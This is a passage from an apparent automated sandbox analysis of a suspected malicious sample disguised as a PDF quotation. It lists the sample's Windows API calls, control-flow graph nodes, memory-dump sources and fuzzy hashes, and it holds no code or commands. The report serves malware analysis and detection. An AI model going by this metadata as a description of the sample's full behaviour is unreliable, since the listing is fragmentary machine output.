CreateActCtxA 13507->13508 13508->13506 13510 b653d8 CreateActCtxA 13509->13510 13512 b6549b 13510->13512

                                                        Executed Functions

                                                        Function 00B6C081 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00B6C0F0
                                                        • GetCurrentThread.KERNEL32 ref: 00B6C12D
                                                        • GetCurrentProcess.KERNEL32 ref: 00B6C16A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00B6C1C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 9c5bacfd16c3b2c61c9751794df19377d7ee48583064676ae6d926bf6c3754be
                                                        • Instruction ID: 2824aa18f6a3a4badc280dd9ec449be820d3ac02dd4f90258684a367b4be39a2
                                                        • Opcode Fuzzy Hash: 9c5bacfd16c3b2c61c9751794df19377d7ee48583064676ae6d926bf6c3754be
                                                        • Instruction Fuzzy Hash: F35156B09057488FDB14CFA9D948BAEBFF0EF49304F24849AE409B7351DB78A944CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6C090 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00B6C0F0
                                                        • GetCurrentThread.KERNEL32 ref: 00B6C12D
                                                        • GetCurrentProcess.KERNEL32 ref: 00B6C16A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00B6C1C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: da7d1cc392132274199bf214f426bc3485000053644a114974e1dbe38b98234f
                                                        • Instruction ID: 5b81f05095d6f1d1b32317bd380062ddfc984d6c21874be65c73a821f1708ba3
                                                        • Opcode Fuzzy Hash: da7d1cc392132274199bf214f426bc3485000053644a114974e1dbe38b98234f
                                                        • Instruction Fuzzy Hash: 2A5156B09007488FDB14CFA9D948BAEBFF0EF49304F248499E419B3351DB78A944CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B69D90 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 39 b69d90-b69da5 call b67a74 42 b69da7 39->42 43 b69dbb-b69dbf 39->43 94 b69dad call b6a018 42->94 95 b69dad call b6a008 42->95 44 b69dd3-b69e14 43->44 45 b69dc1-b69dcb 43->45 50 b69e16-b69e1e 44->50 51 b69e21-b69e2f 44->51 45->44 46 b69db3-b69db5 46->43 48 b69ef0-b69fb0 46->48 87 b69fb2-b69fb5 48->87 88 b69fb8-b69fe3 GetModuleHandleW 48->88 50->51 53 b69e53-b69e55 51->53 54 b69e31-b69e36 51->54 57 b69e58-b69e5f 53->57 55 b69e41 54->55 56 b69e38-b69e3f call b690b8 54->56 60 b69e43-b69e51 55->60 56->60 61 b69e61-b69e69 57->61 62 b69e6c-b69e73 57->62 60->57 61->62 63 b69e75-b69e7d 62->63 64 b69e80-b69e89 call b690c8 62->64 63->64 69 b69e96-b69e9b 64->69 70 b69e8b-b69e93 64->70 72 b69e9d-b69ea4 69->72 73 b69eb9-b69ebd 69->73 70->69 72->73 74 b69ea6-b69eb6 call b690d8 call b690e8 72->74 92 b69ec0 call b6a320 73->92 93 b69ec0 call b6a310 73->93 74->73 77 b69ec3-b69ec6 80 b69ec8-b69ee6 77->80 81 b69ee9-b69eef 77->81 80->81 87->88 89 b69fe5-b69feb 88->89 90 b69fec-b6a000 88->90 89->90 92->77 93->77 94->46 95->46
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00B69FD6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 57430eddcf1736b4d658240f60dff1098de5649ab5c0659abc6ea966aa449cd2
                                                        • Instruction ID: d6054d6a6570582db6f28e82ac40ab2c15aa50f1e541f7285be59cdedaf8d5f8
                                                        • Opcode Fuzzy Hash: 57430eddcf1736b4d658240f60dff1098de5649ab5c0659abc6ea966aa449cd2
                                                        • Instruction Fuzzy Hash: 15713570A00B058FDB24DF6AD04579ABBF5FF88304F00896EE54AD7A40DB79E8098F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B63E70 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 96 b63e70-b65499 CreateActCtxA 99 b654a2-b654fc 96->99 100 b6549b-b654a1 96->100 107 b654fe-b65501 99->107 108 b6550b-b6550f 99->108 100->99 107->108 109 b65520 108->109 110 b65511-b6551d 108->110 112 b65521 109->112 110->109 112->112
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00B65489
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 9eeb0a5a0f04e9bd48a2f4569831416d3aa797ba2e9245e2ec8ef88bbadf4676
                                                        • Instruction ID: ffe3e40cca6f1e22dd3735d095929027d834d5cd44499e30e9b791debd571928
                                                        • Opcode Fuzzy Hash: 9eeb0a5a0f04e9bd48a2f4569831416d3aa797ba2e9245e2ec8ef88bbadf4676
                                                        • Instruction Fuzzy Hash: 3341CF71C0465CCBDB24CFA9C88478EBBF1FF48308F2085A9D519AB255DB756946CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B653CF Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 113 b653cf-b65499 CreateActCtxA 115 b654a2-b654fc 113->115 116 b6549b-b654a1 113->116 123 b654fe-b65501 115->123 124 b6550b-b6550f 115->124 116->115 123->124 125 b65520 124->125 126 b65511-b6551d 124->126 128 b65521 125->128 126->125 128->128
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00B65489
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 392d6e80360bfbae9fbd4ea90af1dcf668edae76645d5e051b1e2bee0c343a43
                                                        • Instruction ID: 7d427b010dc6d5cb5922503bf97e4e761a691782442d960068818d730771691c
                                                        • Opcode Fuzzy Hash: 392d6e80360bfbae9fbd4ea90af1dcf668edae76645d5e051b1e2bee0c343a43
                                                        • Instruction Fuzzy Hash: EC41E171C0465CCFDB24CFA9C88478DBBB1FF48304F2484A9D419AB255DB756946CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6C2B2 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 129 b6c2b2-b6c2b6 130 b6c2b8-b6c34c DuplicateHandle 129->130 131 b6c355-b6c372 130->131 132 b6c34e-b6c354 130->132 132->131
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6C33F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 6987f085258670344bcf559675ddc1d1dbdd649be529cc8c0099ed6e05a71caf
                                                        • Instruction ID: aad44589b7f7f4785f55ab59ca17d3da975224a3fcbf7a290713d592680a6f7e
                                                        • Opcode Fuzzy Hash: 6987f085258670344bcf559675ddc1d1dbdd649be529cc8c0099ed6e05a71caf
                                                        • Instruction Fuzzy Hash: 0021D4B6901248AFDB10CFA9D884ADEBFF4EB49324F14805AE955A7310D378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6C2B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 135 b6c2b8-b6c34c DuplicateHandle 136 b6c355-b6c372 135->136 137 b6c34e-b6c354 135->137 137->136
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6C33F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 6a7c240b5b5c99baff592598e3b18295424bc1062c2c0103bcbf167a8948e6c9
                                                        • Instruction ID: cb9074458e702cc69edcca9726c2a558d8de53883ae7a688cfbbf39fdd13f781
                                                        • Opcode Fuzzy Hash: 6a7c240b5b5c99baff592598e3b18295424bc1062c2c0103bcbf167a8948e6c9
                                                        • Instruction Fuzzy Hash: F021B3B5900248AFDB10CF99D884ADEBBF8EB48324F14841AE955A3310D378A954CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6A1F0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 148 b6a1f0-b6a238 149 b6a240-b6a26f LoadLibraryExW 148->149 150 b6a23a-b6a23d 148->150 151 b6a271-b6a277 149->151 152 b6a278-b6a295 149->152 150->149 151->152
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6A051,00000800,00000000,00000000), ref: 00B6A262
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 017826ab8901a091b36c0c5d09ce0d1642e5c3355cb5136026e01339f0639565
                                                        • Instruction ID: 3188ea57bda9125c5427f0931b3289818643c918d4c8c3cc413e6c8d58b38029
                                                        • Opcode Fuzzy Hash: 017826ab8901a091b36c0c5d09ce0d1642e5c3355cb5136026e01339f0639565
                                                        • Instruction Fuzzy Hash: 8A21F2B29042499FCB10CFAAD884ADEFBF4EB89324F14856AD525B7210C379A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B69110 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 140 b69110-b6a238 142 b6a240-b6a26f LoadLibraryExW 140->142 143 b6a23a-b6a23d 140->143 144 b6a271-b6a277 142->144 145 b6a278-b6a295 142->145 143->142 144->145
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6A051,00000800,00000000,00000000), ref: 00B6A262
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 264096684efe610a69ddf3b0a42f1157ac5ce3a302cef2d804728d929ab251f5
                                                        • Instruction ID: 55acb1feed1c9a7bedfb7b6dfa97d3d38eb6f49f4111d9ee56e19d9f75fe4697
                                                        • Opcode Fuzzy Hash: 264096684efe610a69ddf3b0a42f1157ac5ce3a302cef2d804728d929ab251f5
                                                        • Instruction Fuzzy Hash: 871103B29042499FDF10CF9AD444B9EFBF4EB48324F14846AD515B7600C379A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B69F70 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 155 b69f70-b69fb0 156 b69fb2-b69fb5 155->156 157 b69fb8-b69fe3 GetModuleHandleW 155->157 156->157 158 b69fe5-b69feb 157->158 159 b69fec-b6a000 157->159 158->159
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00B69FD6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: eccadc7b29834732f1cfa671538b2a42cc7085d68e77e3e7a1ca76f18e52ee73
                                                        • Instruction ID: a57049e6978fdc4b11c59d4aaa725eef873161a5796b03e5b4f63bc453c69ed3
                                                        • Opcode Fuzzy Hash: eccadc7b29834732f1cfa671538b2a42cc7085d68e77e3e7a1ca76f18e52ee73
                                                        • Instruction Fuzzy Hash: 0811D2B5D006499FCB10CF9AD444BDEFBF8EB88324F15845AD419B7600D379A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00B6EF70 Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1da0c4f5e80231a41900a3fcdcadfa5a914ea19601eb5528a8c22731e4d040fc
                                                        • Instruction ID: 50724178bace88c3c59158378a11870d7ef0a8fa27d0ec8df02327b866af62d3
                                                        • Opcode Fuzzy Hash: 1da0c4f5e80231a41900a3fcdcadfa5a914ea19601eb5528a8c22731e4d040fc
                                                        • Instruction Fuzzy Hash: 7912C7F1C917468AD710CF56E9D818E3B60F744328BD06A08D2631BAD9D7B815EEEF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6CB24 Relevance: .3, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8b44f3b1035aaf486b49ec056c71888f67c7a1b820e3bbbb3dd2afaf09186b0
                                                        • Instruction ID: ae81c0a62cb48a815ffbfd561a90f534191d7b7705195da42393dbd3854db347
                                                        • Opcode Fuzzy Hash: f8b44f3b1035aaf486b49ec056c71888f67c7a1b820e3bbbb3dd2afaf09186b0
                                                        • Instruction Fuzzy Hash: D7A16C36E002198FCF05DFA5C8845AEBBF2FF85300B1585AAE915BB225DB39E955CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6EF62 Relevance: .2, Instructions: 228COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c286bbcfaad95d1a86db857ad490b5181302770f939b8222357e6f397d14323
                                                        • Instruction ID: 86208819bd966f7d4276b8ea0fc9a328cb5acbce158e44f191a4f271f018d865
                                                        • Opcode Fuzzy Hash: 0c286bbcfaad95d1a86db857ad490b5181302770f939b8222357e6f397d14323
                                                        • Instruction Fuzzy Hash: 45C13BB1C917458BD710CF66E8D818E3B61FB85328FD06B09D1622B6D8D7B814EAEF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:12.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:1.6%
                                                        Total number of Nodes:187
                                                        Total number of Limit Nodes:13
                                                        execution_graph 41563 6498f98 41564 6498fb7 LdrInitializeThunk 41563->41564 41566 6498feb 41564->41566 41428 6624b40 41429 6624b61 41428->41429 41431 6624b84 41428->41431 41430 6624e28 41431->41430 41434 66250ca RegQueryValueExW 41431->41434 41435 6625168 RegQueryValueExW 41431->41435 41436 6625108 RegQueryValueExW 41431->41436 41437 6624e50 41431->41437 41442 6624eb0 41431->41442 41434->41431 41435->41431 41436->41431 41438 6624e5a 41437->41438 41439 6624e71 41438->41439 41440 6624f19 RegOpenKeyExW 41438->41440 41439->41431 41441 6624f76 41440->41441 41441->41441 41443 6624f02 RegOpenKeyExW 41442->41443 41445 6624f76 41443->41445 41408 2d4b0d0 41409 2d4b0ee 41408->41409 41412 2d49e18 41409->41412 41411 2d4b125 41414 2d4cff8 LoadLibraryA 41412->41414 41415 2d4d0d4 41414->41415 41446 2d44560 41447 2d44574 41446->41447 41450 2d447aa 41447->41450 41448 2d4457d 41451 2d447b3 41450->41451 41456 2d449a6 41450->41456 41461 2d4498c 41450->41461 41466 2d44883 41450->41466 41471 2d44890 41450->41471 41451->41448 41457 2d449b9 41456->41457 41458 2d449cb 41456->41458 41476 2d44c98 41457->41476 41481 2d44c88 41457->41481 41462 2d4493f 41461->41462 41463 2d449cb 41462->41463 41464 2d44c98 2 API calls 41462->41464 41465 2d44c88 2 API calls 41462->41465 41464->41463 41465->41463 41467 2d448d4 41466->41467 41468 2d449cb 41467->41468 41469 2d44c98 2 API calls 41467->41469 41470 2d44c88 2 API calls 41467->41470 41469->41468 41470->41468 41472 2d448d4 41471->41472 41473 2d449cb 41472->41473 41474 2d44c98 2 API calls 41472->41474 41475 2d44c88 2 API calls 41472->41475 41474->41473 41475->41473 41477 2d44ca6 41476->41477 41486 2d44cd8 41477->41486 41490 2d44ce8 41477->41490 41478 2d44cb6 41478->41458 41482 2d44c98 41481->41482 41484 2d44cd8 RtlEncodePointer 41482->41484 41485 2d44ce8 RtlEncodePointer 41482->41485 41483 2d44cb6 41483->41458 41484->41483 41485->41483 41487 2d44ce8 41486->41487 41488 2d44d4c RtlEncodePointer 41487->41488 41489 2d44d75 41487->41489 41488->41489 41489->41478 41491 2d44d22 41490->41491 41492 2d44d4c RtlEncodePointer 41491->41492 41493 2d44d75 41491->41493 41492->41493 41493->41478 41416 645a840 41417 645a868 41416->41417 41420 645a894 41416->41420 41418 645a871 41417->41418 41421 6459d4c 41417->41421 41422 6459d57 41421->41422 41423 645ab8b 41422->41423 41425 6459d68 41422->41425 41423->41420 41426 645abc0 OleInitialize 41425->41426 41427 645ac24 41426->41427 41427->41423 41571 12ae3dc 41572 12ae3f4 41571->41572 41573 12ae44e 41572->41573 41579 6456690 41572->41579 41583 6453788 41572->41583 41591 6457768 41572->41591 41600 645667f 41572->41600 41604 64537cc 41572->41604 41580 64566b6 41579->41580 41581 64537cc CallWindowProcW 41580->41581 41582 64566d7 41581->41582 41582->41573 41584 645376f 41583->41584 41584->41583 41585 6458c42 41584->41585 41586 6458cec 41584->41586 41587 64537c7 41584->41587 41588 6458c9a CallWindowProcW 41585->41588 41590 6458c49 41585->41590 41589 64537cc CallWindowProcW 41586->41589 41587->41573 41588->41590 41589->41590 41590->41573 41594 64577a5 41591->41594 41592 64577d9 41595 64577d7 41592->41595 41629 6453894 41592->41629 41594->41592 41596 64577c9 41594->41596 41613 64578f0 41596->41613 41618 64579cc 41596->41618 41624 6457900 41596->41624 41601 6456690 41600->41601 41602 64537cc CallWindowProcW 41601->41602 41603 64566d7 41602->41603 41603->41573 41605 64537d7 41604->41605 41606 64577d9 41605->41606 41609 64577c9 41605->41609 41607 64577d7 41606->41607 41608 6453894 CallWindowProcW 41606->41608 41608->41607 41610 64578f0 CallWindowProcW 41609->41610 41611 6457900 CallWindowProcW 41609->41611 41612 64579cc CallWindowProcW 41609->41612 41610->41607 41611->41607 41612->41607 41615 6457914 41613->41615 41614 64579a0 41614->41595 41633 64579a8 41615->41633 41637 64579b8 41615->41637 41619 645798a 41618->41619 41620 64579da 41618->41620 41622 64579a8 CallWindowProcW 41619->41622 41623 64579b8 CallWindowProcW 41619->41623 41621 64579a0 41621->41595 41622->41621 41623->41621 41626 6457914 41624->41626 41625 64579a0 41625->41595 41627 64579a8 CallWindowProcW 41626->41627 41628 64579b8 CallWindowProcW 41626->41628 41627->41625 41628->41625 41630 645389f 41629->41630 41631 6458c9a CallWindowProcW 41630->41631 41632 6458c49 41630->41632 41631->41632 41632->41595 41634 64579b8 41633->41634 41635 64579c9 41634->41635 41640 6458bd9 41634->41640 41635->41614 41638 64579c9 41637->41638 41639 6458bd9 CallWindowProcW 41637->41639 41638->41614 41639->41638 41641 6453894 CallWindowProcW 41640->41641 41642 6458bea 41641->41642 41642->41635 41555 6624928 41557 6624949 41555->41557 41556 6624b25 41557->41556 41558 6624e50 RegOpenKeyExW 41557->41558 41559 6624eb0 RegOpenKeyExW 41557->41559 41560 66250ca RegQueryValueExW 41557->41560 41561 6625168 RegQueryValueExW 41557->41561 41562 6625108 RegQueryValueExW 41557->41562 41558->41557 41559->41557 41560->41557 41561->41557 41562->41557 41494 6454178 41496 64541a9 41494->41496 41497 645429a 41494->41497 41495 64541b5 41496->41495 41503 64543e0 41496->41503 41506 64543da 41496->41506 41498 64541f5 41510 64556c0 41498->41510 41515 64556d0 41498->41515 41520 6454420 41503->41520 41504 64543ea 41504->41498 41507 64543e0 41506->41507 41509 6454420 2 API calls 41507->41509 41508 64543ea 41508->41498 41509->41508 41511 64556d0 41510->41511 41512 64557a1 41511->41512 41541 6456479 41511->41541 41548 6456488 41511->41548 41516 64556fa 41515->41516 41517 64557a1 41516->41517 41518 6456479 2 API calls 41516->41518 41519 6456488 CreateWindowExW 41516->41519 41518->41517 41519->41517 41521 64543b5 41520->41521 41522 645442b 41520->41522 41521->41504 41523 645445b 41522->41523 41529 64546a8 41522->41529 41533 64546b8 41522->41533 41523->41504 41524 6454453 41524->41523 41525 6454658 GetModuleHandleW 41524->41525 41526 6454685 41525->41526 41526->41504 41530 64546cc 41529->41530 41532 64546f1 41530->41532 41537 6453668 41530->41537 41532->41524 41534 64546cc 41533->41534 41535 6453668 LoadLibraryExW 41534->41535 41536 64546f1 41534->41536 41535->41536 41536->41524 41538 6454878 LoadLibraryExW 41537->41538 41540 64548f1 41538->41540 41540->41532 41542 64564c6 CreateWindowExW 41541->41542 41543 645648e 41541->41543 41547 64565fc 41542->41547 41551 64537a4 41543->41551 41549 64564bd 41548->41549 41550 64537a4 CreateWindowExW 41548->41550 41549->41512 41550->41549 41552 64564d8 CreateWindowExW 41551->41552 41554 64565fc 41552->41554

                                                        Executed Functions

                                                        Function 06498F98 Relevance: 1.7, APIs: 1, Instructions: 185libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1511 6498f98-6498fe4 LdrInitializeThunk 1515 6498feb-6498ff7 1511->1515 1516 6498ffd-6499006 1515->1516 1517 6499215-6499228 1515->1517 1518 649924a 1516->1518 1519 649900c-6499021 1516->1519 1520 649924f-6499253 1517->1520 1518->1520 1524 649903b-6499056 1519->1524 1525 6499023-6499036 1519->1525 1521 649925e 1520->1521 1522 6499255 1520->1522 1526 649925f 1521->1526 1522->1521 1534 6499058-6499062 1524->1534 1535 6499064 1524->1535 1527 64991e9-64991ed 1525->1527 1526->1526 1528 64991f8 1527->1528 1529 64991ef 1527->1529 1531 64991f9 1528->1531 1529->1528 1531->1531 1536 6499069-649906b 1534->1536 1535->1536 1537 649906d-6499080 1536->1537 1538 6499085-6499120 1536->1538 1537->1527 1556 649912e 1538->1556 1557 6499122-649912c 1538->1557 1558 6499133-6499135 1556->1558 1557->1558 1559 6499193-64991e7 1558->1559 1560 6499137-6499139 1558->1560 1559->1527 1561 649913b-6499145 1560->1561 1562 6499147 1560->1562 1564 649914c-649914e 1561->1564 1562->1564 1564->1559 1565 6499150-6499191 1564->1565 1565->1559
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fcbdccec313b186a3534ad3b05fc09688adbda4266d6a8680d6d82e6a5ff153a
                                                        • Instruction ID: 24110ca9d5fea9280c9af137b745df3ab6fd95cd8658d2ad1d31ff2d54a6a689
                                                        • Opcode Fuzzy Hash: fcbdccec313b186a3534ad3b05fc09688adbda4266d6a8680d6d82e6a5ff153a
                                                        • Instruction Fuzzy Hash: 13714834E402098FDF54EFB0D9586AEBBB6BF85349F14892AD002A7394DF349D46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06454420 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1454 6454420-6454429 1455 64543b5-64543c9 1454->1455 1456 645442b-6454445 call 6453620 1454->1456 1459 6454447 1456->1459 1460 645445b-645445f 1456->1460 1509 645444d call 64546a8 1459->1509 1510 645444d call 64546b8 1459->1510 1461 6454461-645446b 1460->1461 1462 6454473-64544b4 1460->1462 1461->1462 1467 64544b6-64544be 1462->1467 1468 64544c1-64544cf 1462->1468 1463 6454453-6454455 1463->1460 1465 6454590-6454650 1463->1465 1504 6454652-6454655 1465->1504 1505 6454658-6454683 GetModuleHandleW 1465->1505 1467->1468 1470 64544d1-64544d6 1468->1470 1471 64544f3-64544f5 1468->1471 1472 64544e1 1470->1472 1473 64544d8-64544df call 645362c 1470->1473 1474 64544f8-64544ff 1471->1474 1477 64544e3-64544f1 1472->1477 1473->1477 1478 6454501-6454509 1474->1478 1479 645450c-6454513 1474->1479 1477->1474 1478->1479 1480 6454515-645451d 1479->1480 1481 6454520-6454529 1479->1481 1480->1481 1485 6454536-645453b 1481->1485 1486 645452b-6454533 1481->1486 1488 645453d-6454544 1485->1488 1489 6454559-6454566 1485->1489 1486->1485 1488->1489 1490 6454546-6454556 call 6451544 call 645363c 1488->1490 1496 6454589-645458f 1489->1496 1497 6454568-6454586 1489->1497 1490->1489 1497->1496 1504->1505 1506 6454685-645468b 1505->1506 1507 645468c-64546a0 1505->1507 1506->1507 1509->1463 1510->1463
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06454676
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
